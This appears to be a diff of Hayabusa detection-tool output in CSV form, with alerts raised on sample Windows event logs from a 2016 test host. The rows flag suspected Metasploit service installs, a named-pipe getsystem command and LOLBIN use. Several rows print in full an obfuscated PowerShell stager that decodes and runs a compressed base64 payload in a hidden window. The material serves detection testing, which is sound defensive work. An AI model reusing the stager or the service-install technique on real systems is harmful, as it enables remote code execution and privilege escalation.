+2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,info,,New Service Installed,Name: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,info,,New Service Installed,Name: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:08:53.832 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x274 | User: IEUser | LID: 0x1d069",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,info,,New Service Installed,Name: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,info,,New Service Installed,Name: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,info,,New Service Installed,Name: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:16:40.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xad4 | User: IEUser | LID: 0x1ceaf",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,info,,New Service Installed,Name: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,info,,New Service Installed,Name: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x12c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 